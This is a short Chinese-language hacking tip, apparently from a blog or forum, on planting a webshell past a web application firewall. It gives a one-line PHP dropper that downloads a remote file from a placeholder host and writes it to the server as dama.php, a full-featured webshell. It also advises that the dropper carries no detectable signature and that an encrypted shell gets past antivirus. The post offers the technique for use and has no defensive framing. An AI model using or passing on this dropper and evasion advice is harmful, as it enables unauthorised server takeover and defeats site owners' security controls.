远程下载马bypass waf

<?php file_put_contents('dama.php',file_get_contents('http://xxx/xx.txt'));?>

php这个函数不算冷门

第一个参数是保存的文件名，如果已存在则报错停止

第二个参数是内容，可以是字符串，也可以使用file_get_contents获取一个马子内容

其实不算什么冷知识了，只是有时候一句话会被拦截，用这个会直接生成一个大马，而且本身是没有什么特征的

除非杀软直接监控的文件写入，换个加密马就行了。

可能是个人喜欢用大马吧，觉得挺方便的。